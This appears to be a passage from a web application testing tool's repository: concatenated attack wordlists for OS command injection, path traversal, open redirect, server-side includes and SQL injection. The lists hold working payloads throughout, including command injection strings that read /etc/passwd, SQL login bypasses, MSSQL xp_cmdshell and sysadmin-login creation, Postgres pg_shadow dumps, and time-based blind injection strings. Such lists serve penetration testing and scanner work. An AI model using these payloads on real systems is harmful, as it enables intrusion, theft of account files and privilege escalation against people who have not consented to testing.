26 | comm 27 | command 28 | complete 29 | continue 30 | cp 31 | cron 32 | crontab 33 | curl 34 | cut 35 | date 36 | dc 37 | dd 38 | declare 39 | defaults 40 | df 41 | diff 42 | diff3 43 | dig 44 | dirname 45 | dirs 46 | diskutil 47 | disown 48 | ditto 49 | dot_clean 50 | drutil 51 | dscacheutil 52 | dscl 53 | du 54 | echo 55 | ed 56 | enable 57 | env 58 | eval 59 | exec 60 | exit 61 | expand 62 | expect 63 | export 64 | expr 65 | false 66 | fc 67 | fdisk 68 | fg 69 | file 70 | find 71 | fmt 72 | fold 73 | for 74 | fsck 75 | fsaclctl 76 | fs_usage 77 | ftp 78 | GetFileInfo 79 | getopt 80 | getopts 81 | goto 82 | grep 83 | groups 84 | gzip 85 | hash 86 | head 87 | hdiutil 88 | history 89 | hostname 90 | id 91 | if 92 | info 93 | install 94 | jobs 95 | join 96 | kextfind 97 | kickstart 98 | kill 99 | l 100 | last 101 | launchctl 102 | ll 103 | less 104 | let 105 | lipo 106 | ln 107 | local 108 | locate 109 | logname 110 | login 111 | logout 112 | lpr 113 | lprm 114 | lpstat 115 | ls 116 | lsregister 117 | lsbom 118 | lsof 119 | man 120 | mdfind 121 | mdutil 122 | mkdir 123 | mkfifo 124 | more 125 | mount 126 | mv 127 | net 128 | netstat 129 | networksetup 130 | nice 131 | nohup 132 | ntfs.util 133 | onintr 134 | open 135 | opensnoop 136 | osacompile 137 | osascript 138 | passwd 139 | paste 140 | pbcopy 141 | pbpaste 142 | pico 143 | ping 144 | pkgutil 145 | plutil 146 | pmset 147 | popd 148 | pr 149 | printenv 150 | printf 151 | ps 152 | pushd 153 | pwd 154 | quota 155 | rcp 156 | read 157 | readonly 158 | reboot 159 | return 160 | rev 161 | rm 162 | rmdir 163 | rpm 164 | rsync 165 | say 166 | screen 167 | screencapture 168 | sdiff 169 | security 170 | sed 171 | select 172 | set 173 | setfile 174 | shift 175 | shopt 176 | shutdown 177 | sips 178 | sleep 179 | softwareupdate 180 | sort 181 | source 182 | split 183 | stop 184 | su 185 | sudo 186 | sum 187 | suspend 188 | sw_vers 189 | system_profiler 190 | systemsetup 191 | tail 192 | tar 193 | tee 194 | test 195 | textutil 196 | time 197 | times 198 | top 199 | touch 200 | tr 201 | trap 202 | traceroute 203 | true 204 | tty 205 | type 206 | ufs.util 207 | ulimit 208 | umask 209 | umount 210 | unalias 211 | uname 212 | unexpand 213 | uniq 214 | units 215 | unset 216 | until 217 | users 218 | uuencode 219 | uudecode 220 | uuidgen 221 | uucp 222 | vi 223 | wait 224 | wc 225 | whatis 226 | where 227 | which 228 | while 229 | who 230 | whoami 231 | write 232 | xargs 233 | yes 234 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/Commands-Windows.txt: -------------------------------------------------------------------------------- 1 | a 2 | arp 3 | assoc 4 | at 5 | atmadm 6 | attrib 7 | bootcfg 8 | break 9 | cacls 10 | call 11 | change 12 | chcp 13 | chdir 14 | chkdsk 15 | chkntfs 16 | cipher 17 | cls 18 | cmd 19 | cmstp 20 | color 21 | comp 22 | compact 23 | convert 24 | copy 25 | cprofile 26 | cscript 27 | date 28 | defrag 29 | del 30 | dir 31 | diskcomp 32 | diskcopy 33 | diskpart 34 | doskey 35 | driverquery 36 | echo 37 | endlocal 38 | eventcreate 39 | eventquery 40 | eventtriggers 41 | evntcmd 42 | exit 43 | expand 44 | fc 45 | filter 46 | find 47 | findstr 48 | finger 49 | flattemp 50 | for 51 | format 52 | fsutil 53 | ftp 54 | ftype 55 | getmac 56 | goto 57 | gpresult 58 | gpupdate 59 | graftabl 60 | help 61 | helpctr 62 | hostname 63 | if 64 | ipconfig 65 | ipseccmd 66 | ipxroute 67 | irftp 68 | label 69 | lodctr 70 | logman 71 | lpq 72 | lpr 73 | macfile 74 | mkdir 75 | mmc 76 | mode 77 | more 78 | mountvol 79 | move 80 | msiexec 81 | msinfo32 82 | nbtstat 83 | net 84 | netsh 85 | netstat 86 | nslookup 87 | ntbackup 88 | ntcmdprompt 89 | ntsd 90 | openfiles 91 | pagefileconfig 92 | path 93 | pathping 94 | pause 95 | pbadmin 96 | pentnt 97 | perfmon 98 | ping 99 | popd 100 | print 101 | prncnfg 102 | prndrvr 103 | prnjobs 104 | prnmngr 105 | prnport 106 | prnqctl 107 | prompt 108 | pushd 109 | query 110 | rasdial 111 | rcp 112 | recover 113 | reg 114 | regsvr32 115 | relog 116 | rem 117 | rename 118 | replace 119 | rexec 120 | rmdir 121 | route 122 | rsh 123 | rsm 124 | runas 125 | sc 126 | schtasks 127 | secedit 128 | set 129 | setlocal 130 | shift 131 | shutdown 132 | sort 133 | start 134 | subst 135 | systeminfo 136 | sfc 137 | taskkill 138 | tasklist 139 | tcmsetup 140 | telnet 141 | tftp 142 | time 143 | title 144 | tracerpt 145 | tracert 146 | tree 147 | type 148 | typeperf 149 | unlodctr 150 | ver 151 | verify 152 | vol 153 | vssadmin 154 | w32tm 155 | winnt 156 | winnt32 157 | wmic 158 | xcopy 159 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/Commands-WindowsPowershell.txt: -------------------------------------------------------------------------------- 1 | get-acl 2 | set-acl 3 | get-alias 4 | import-alias 5 | new-alias 6 | set-alias 7 | get-authenticodesignature 8 | set-authenticodesignature 9 | set-location 10 | get-childitem 11 | get-command 12 | measure-command 13 | trace-command 14 | add-content 15 | get-content 16 | set-content 17 | clear-content 18 | convertto-html 19 | convertfrom-securestring 20 | convertto-securestring 21 | clear-host 22 | clear-item 23 | copy-item 24 | get-credential 25 | get-childitem 26 | get-date 27 | set-date 28 | remove-item 29 | do 30 | get-psdrive 31 | new-psdrive 32 | remove-psdrive 33 | get-eventlog 34 | get-executionpolicy 35 | set-executionpolicy 36 | export-alias 37 | export-clixml 38 | export-console 39 | export-csv 40 | invoke-expression 41 | exit 42 | foreach-object 43 | foreach 44 | for 45 | format-custom 46 | format-list 47 | format-table 48 | format-wide 49 | get-item 50 | get-childitem 51 | get-help 52 | add-history 53 | get-history 54 | invoke-history 55 | get-host 56 | clear-host 57 | read-host 58 | write-host 59 | if 60 | import-clixml 61 | import-csv 62 | get-item 63 | invoke-item 64 | new-item 65 | remove-item 66 | set-item 67 | clear-itemproperty 68 | copy-itemproperty 69 | get-itemproperty 70 | move-itemproperty 71 | new-itemproperty 72 | remove-itemproperty 73 | rename-itemproperty 74 | set-itemproperty 75 | stop-process 76 | get-location 77 | pop-location 78 | push-location 79 | set-location 80 | add-member 81 | get-member 82 | move-item 83 | compare-object 84 | group-object 85 | measure-object 86 | new-object 87 | select-object 88 | sort-object 89 | where-object 90 | out-default 91 | out-file 92 | out-host 93 | out-null 94 | out-printer 95 | out-string 96 | powershell 97 | convert-path 98 | join-path 99 | resolve-path 100 | split-path 101 | test-path 102 | get-pfxcertificate 103 | pop-location 104 | push-location 105 | get-process 106 | stop-process 107 | clear-itemproperty 108 | copy-itemproperty 109 | get-itemproperty 110 | move-itemproperty 111 | new-itemproperty 112 | remove-itemproperty 113 | rename-itemproperty 114 | set-itemproperty 115 | get-psprovider 116 | set-psdebug 117 | add-pssnapin 118 | get-pssnapin 119 | remove-pssnapin 120 | quest 121 | read-host 122 | remove-item 123 | rename-item 124 | rename-itemproperty 125 | run/call 126 | select-object 127 | get-service 128 | new-service 129 | restart-service 130 | resume-service 131 | set-service 132 | sort-object 133 | start-service 134 | stop-service 135 | suspend-service 136 | start-sleep 137 | switch 138 | select-string 139 | tee-object 140 | new-timespan 141 | trace-command 142 | get-tracesource 143 | set-tracesource 144 | start-transcript 145 | stop-transcript 146 | get-uiculture 147 | get-unique 148 | update-formatdata 149 | update-typedata 150 | clear-variable 151 | get-variable 152 | new-variable 153 | remove-variable 154 | set-variable 155 | where-object 156 | where 157 | while 158 | get-wmiobject 159 | write-debug 160 | write-error 161 | write-output 162 | write-progress 163 | write-verbose 164 | write-warning 165 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/OSCommandInject.Windows.txt: -------------------------------------------------------------------------------- 1 | +|+Dir+c:\ 2 | $+|+Dir+c:\ 3 | %26%26+|+dir c:\ 4 | $%26%26dir c:\ 5 | %0a+dir+c:\ 6 | +|+Dir+c:%255c 7 | $+|+Dir+c:%255c 8 | %26%26+|+dir c:%255c 9 | $%26%26dir+c:%255c 10 | %0a+dir+c:%255c 11 | +|+Dir+c:%2f 12 | $+|+Dir+c:%2f 13 | %26%26+|+dir c:%2f 14 | $%26%26dir+c:%2f 15 | %0a+dir+c:%2f 16 | +dir+c:\+| 17 | +|+dir+c:\+| 18 | +|+dir+c:%2f+| 19 | dir+c:\ 20 | ||+dir|c:\ 21 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | /index.html|id| 4 | ;id; 5 | ;id 6 | ;netstat -a; 7 | ;id; 8 | |id 9 | |/usr/bin/id 10 | |id| 11 | |/usr/bin/id| 12 | ||/usr/bin/id| 13 | |id; 14 | ||/usr/bin/id; 15 | ;id| 16 | ;|/usr/bin/id| 17 | \n/bin/ls -al\n 18 | \n/usr/bin/id\n 19 | \nid\n 20 | \n/usr/bin/id; 21 | \nid; 22 | \n/usr/bin/id| 23 | \nid| 24 | ;/usr/bin/id\n 25 | ;id\n 26 | |usr/bin/id\n 27 | |nid\n 28 | `id` 29 | `/usr/bin/id` 30 | a);id 31 | a;id 32 | a);id; 33 | a;id; 34 | a);id| 35 | a;id| 36 | a)|id 37 | a|id 38 | a)|id; 39 | a|id 40 | |/bin/ls -al 41 | a);/usr/bin/id 42 | a;/usr/bin/id 43 | a);/usr/bin/id; 44 | a;/usr/bin/id; 45 | a);/usr/bin/id| 46 | a;/usr/bin/id| 47 | a)|/usr/bin/id 48 | a|/usr/bin/id 49 | a)|/usr/bin/id; 50 | a|/usr/bin/id 51 | ;system('cat%20/etc/passwd') 52 | ;system('id') 53 | ;system('/usr/bin/id') 54 | %0Acat%20/etc/passwd 55 | %0A/usr/bin/id 56 | %0Aid 57 | %0A/usr/bin/id%0A 58 | %0Aid%0A 59 | & ping -i 30 127.0.0.1 & 60 | & ping -n 30 127.0.0.1 & 61 | %0a ping -i 30 127.0.0.1 %0a 62 | `ping 127.0.0.1` 63 | | id 64 | & id 65 | ; id 66 | %0a id %0a 67 | `id` 68 | $;/usr/bin/id 69 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/command-injection-template.txt: -------------------------------------------------------------------------------- 1 | {cmd} 2 | ;{cmd} 3 | ;{cmd}; 4 | ^{cmd} 5 | |{cmd} 6 | <{cmd} 7 | <{cmd}; 8 | <{cmd}\n 9 | <{cmd}%0D 10 | <{cmd}%0A 11 | &{cmd} 12 | &{cmd}& 13 | &&{cmd} 14 | &&{cmd}&& 15 | %0D{cmd} 16 | %0D{cmd}%0D 17 | %0A{cmd} 18 | %0A{cmd}%0A 19 | \n{cmd} 20 | \n{cmd}\n 21 | '{cmd}' 22 | `{cmd}` 23 | ;{cmd}| 24 | ;{cmd}/n 25 | |{cmd}; 26 | a);{cmd} 27 | a;{cmd} 28 | a);{cmd} 29 | a;{cmd}; 30 | a);{cmd}| 31 | FAIL||{cmd} 32 | CMD=$'{cmd}';$CMD 33 | ;CMD=$'{cmd}';$CMD 34 | ^CMD=$'{cmd}';$CMD 35 | |CMD=$'{cmd}';$CMD 36 | &CMD=$'{cmd}';$CMD 37 | &&CMD=$'{cmd}';$CMD 38 | %0DCMD=$'{cmd}';$CMD 39 | FAIL||CMD=$'{cmd}';$CMD 40 | CMD=$\'{cmd}\';$CMD 41 | ;CMD=$\'{cmd}\';$CMD 42 | ^CMD=$\'{cmd}\';$CMD 43 | |CMD=$\'{cmd}\';$CMD 44 | &CMD=$\'{cmd}\';$CMD 45 | &&CMD=$\'{cmd}\';$CMD 46 | %0DCMD=$\'{cmd}\';$CMD 47 | FAIL||CMD=$\'{cmd}\';$CMD 48 | CMD=$"{cmd}";$CMD 49 | ;CMD=$"{cmd}";$CMD 50 | ^CMD=$"{cmd}";$CMD 51 | |CMD=$"{cmd}";$CMD 52 | &CMD=$"{cmd}";$CMD 53 | &&CMD=$"{cmd}";$CMD 54 | %0DCMD=$"{cmd}";$CMD 55 | FAIL||CMD=$"{cmd}";$CMD 56 | 57 | ;system('{cmd}') 58 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/shell-delimiters.txt: -------------------------------------------------------------------------------- 1 | ; 2 | ^ 3 | & 4 | && 5 | | 6 | || 7 | %0D 8 | %0A 9 | \n 10 | < 11 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/shell-operators.txt: -------------------------------------------------------------------------------- 1 | < 2 | > 3 | << 4 | >> 5 | <> 6 | >| 7 | | 8 | || 9 | & 10 | && 11 | $ 12 | ; 13 | &> 14 | &>> 15 | <<< 16 | >>> 17 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt: -------------------------------------------------------------------------------- 1 | ..%255c 2 | .%5c../..%5c 3 | /..%c0%9v../ 4 | /..%c0%af../ 5 | /..%255c..%255c 6 | 7 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/useful-commands-unix.txt: -------------------------------------------------------------------------------- 1 | uname -n -s 2 | whoami 3 | pwd 4 | last 5 | cat /etc/passwd 6 | ls -la /tmp 7 | ls -la /home 8 | ping -i 30 127.0.0.1 9 | ping 127.0.0.1 10 | ping -n 30 11 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/useful-commands-windows.txt: -------------------------------------------------------------------------------- 1 | ver 2 | chdir 3 | echo %USERNAME% 4 | -------------------------------------------------------------------------------- /wordlist/attack/os-dir-indexing/directory-indexing.txt: -------------------------------------------------------------------------------- 1 | ;dir 2 | `dir` 3 | |dir| 4 | |dir 5 | /%3f.jsp 6 | ?M=D 7 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 8 | -------------------------------------------------------------------------------- /wordlist/attack/path-traversal/path-traversal-windows.txt: -------------------------------------------------------------------------------- 1 | C:/inetpub/wwwroot/global.asa 2 | C:\inetpub\wwwroot\global.asa 3 | C:/boot.ini 4 | C:\boot.ini 5 | D:\inetpub\wwwroot\global.asa 6 | D:/inetpub/wwwroot/global.asa 7 | -------------------------------------------------------------------------------- /wordlist/attack/redirect/redirect-injection-template.txt: -------------------------------------------------------------------------------- 1 | {target} 2 | /{target} 3 | //{target} 4 | ///{target} 5 | ////{target} 6 | /\{target} 7 | %2f{target} 8 | %2f$2f{target} 9 | %2f{target}%2f%2f 10 | $2f%2f{target}%2f%2f 11 | %2f{target}// 12 | -------------------------------------------------------------------------------- /wordlist/attack/redirect/redirect-urls-template.txt: -------------------------------------------------------------------------------- 1 | ?url=http://{target} 2 | ?url=https://{target} 3 | ?next=http://{target} 4 | ?next=https://{target} 5 | ?url=http://{target} 6 | ?url=https://{target} 7 | ?url=http://{target} 8 | ?url=//{target} 9 | ?url=$2f%2f{target} 10 | ?next=//{target} 11 | ?next=$2f%2f{target} 12 | ?url=//{target} 13 | ?url=$2f%2f{target} 14 | ?url=//{target} 15 | /redirect/{target} 16 | /cgi-bin/redirect.cgi?{target} 17 | /out/{target} 18 | /out?{target} 19 | /out?/{target} 20 | /out?//{target} 21 | /out?/\{target} 22 | /out?///{target} 23 | ?view={target} 24 | ?view=/{target} 25 | ?view=//{target} 26 | ?view=/\{target} 27 | ?view=///{target} 28 | /login?to={target} 29 | /login?to=/{target} 30 | /login?to=//{target} 31 | /login?to=/\{target} 32 | /login?to=///{target} 33 | -------------------------------------------------------------------------------- /wordlist/attack/server-side-include/server-side-includes-generic.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 |
63 |
64 | 66 |
67 | 68 |
69 | 70 | 71 | 72 | 73 | 74 | 75 |
76 |
77 |
78 |
79 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/GenericBlind.txt: -------------------------------------------------------------------------------- 1 | sleep(__TIME__)# 2 | 1 or sleep(__TIME__)# 3 | " or sleep(__TIME__)# 4 | ' or sleep(__TIME__)# 5 | " or sleep(__TIME__)=" 6 | ' or sleep(__TIME__)=' 7 | 1) or sleep(__TIME__)# 8 | ") or sleep(__TIME__)=" 9 | ') or sleep(__TIME__)=' 10 | 1)) or sleep(__TIME__)# 11 | ")) or sleep(__TIME__)=" 12 | ')) or sleep(__TIME__)=' 13 | ;waitfor delay '0:0:__TIME__'-- 14 | );waitfor delay '0:0:__TIME__'-- 15 | ';waitfor delay '0:0:__TIME__'-- 16 | ";waitfor delay '0:0:__TIME__'-- 17 | ');waitfor delay '0:0:__TIME__'-- 18 | ");waitfor delay '0:0:__TIME__'-- 19 | ));waitfor delay '0:0:__TIME__'-- 20 | '));waitfor delay '0:0:__TIME__'-- 21 | "));waitfor delay '0:0:__TIME__'-- 22 | benchmark(10000000,MD5(1))# 23 | 1 or benchmark(10000000,MD5(1))# 24 | " or benchmark(10000000,MD5(1))# 25 | ' or benchmark(10000000,MD5(1))# 26 | 1) or benchmark(10000000,MD5(1))# 27 | ") or benchmark(10000000,MD5(1))# 28 | ') or benchmark(10000000,MD5(1))# 29 | 1)) or benchmark(10000000,MD5(1))# 30 | ")) or benchmark(10000000,MD5(1))# 31 | ')) or benchmark(10000000,MD5(1))# 32 | pg_sleep(__TIME__)-- 33 | 1 or pg_sleep(__TIME__)-- 34 | " or pg_sleep(__TIME__)-- 35 | ' or pg_sleep(__TIME__)-- 36 | 1) or pg_sleep(__TIME__)-- 37 | ") or pg_sleep(__TIME__)-- 38 | ') or pg_sleep(__TIME__)-- 39 | 1)) or pg_sleep(__TIME__)-- 40 | ")) or pg_sleep(__TIME__)-- 41 | ')) or pg_sleep(__TIME__)-- 42 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/Generic_SQLI.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MSSQL.txt: -------------------------------------------------------------------------------- 1 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 2 | 'create user name identified by 'pass123' -- 3 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 4 | ' ; drop table temp -- 5 | 'exec sp_addlogin 'name' , 'password' -- 6 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 7 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 8 | ' grant connect to name; grant resource to name; -- 9 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 10 | ' or 1=1 -- 11 | ' union (select @@version) -- 12 | ' union (select NULL, (select @@version)) -- 13 | ' union (select NULL, NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 17 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MSSQL_blind.txt: -------------------------------------------------------------------------------- 1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- 2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- 3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- 4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- 5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- 6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 9 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MySQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | 1or1=1 8 | 1'or'1'='1 9 | fake@ema'or'il.nl'='il.nl 10 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MySQL_MSSQL.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1 and user_name() = 'dbo' 3 | \'; desc users; -- 4 | 1\'1 5 | 1' and non_existant_table = '1 6 | ' or username is not NULL or username = ' 7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 9 | 1 uni/**/on select all from where 10 | 11 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/db2-enumeration.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/ms-sql-enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/sql-injection/exploit/ms-sql-enumeration.txt -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/mysql-injection-login-bypass.txt: -------------------------------------------------------------------------------- 1 | ' OR 1=1-- 2 | 'OR '' = ' Allows authentication without a valid username. 3 | '-- 4 | ' union select 1, '', '' 1-- 5 | 'OR 1=1-- 6 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/mysql-read-local-files.txt: -------------------------------------------------------------------------------- 1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 2 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/postgres-enumeration.txt: -------------------------------------------------------------------------------- 1 | select version(); 2 | select current_database(); 3 | select current_user; 4 | select session_user; 5 | select current_setting('log_connections'); 6 | select current_setting('log_statement'); 7 | select current_setting('port'); 8 | select current_setting('password_encryption'); 9 | select current_setting('krb_server_keyfile'); 10 | select current_setting('virtual_host'); 11 | select current_setting('port'); 12 | select current_setting('config_file'); 13 | select current_setting('hba_file'); 14 | select current_setting('data_directory'); 15 | select * from pg_shadow; 16 | select * from pg_group; 17 | create table myfile (input TEXT); 18 | copy myfile from '/etc/passwd'; 19 | select * from myfile;copy myfile to /tmp/test; 20 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-ORDER_BY.txt: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 